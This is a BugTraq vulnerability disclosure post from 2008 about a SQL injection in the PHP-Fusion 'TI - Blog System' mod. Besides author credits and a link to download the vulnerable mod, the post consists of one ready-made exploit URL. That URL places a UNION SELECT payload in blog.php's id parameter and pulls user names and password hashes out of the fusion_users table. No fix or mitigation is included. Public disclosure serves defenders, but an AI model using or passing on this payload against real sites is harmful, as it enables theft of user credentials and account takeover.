BugTraq
PHP-Fusion Mod TI - Blog System Sql Injection Dec 25 2008 03:12PM
r3d w0rm yahoo com
########################################################################
#############

#### PHP-Fusion Mod TI - Blog System Sql Injection ####

########################################################################
#############

# #

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #

#Discovered by : Sina Yazdanmehr (R3d.W0rm) #

#Our Site : Http://IRCRASH.COM #

#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi

########################################################################
#############

# #

#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=15
7

# #

########################################################################
#############

# [Bug] #

# #

#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,u
ser_name,user_password,5+from+fusion_users/*

# #

########################################################################
#############

# Site : Http://IRCRASH.COM #

###################################### TNX GOD ######################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus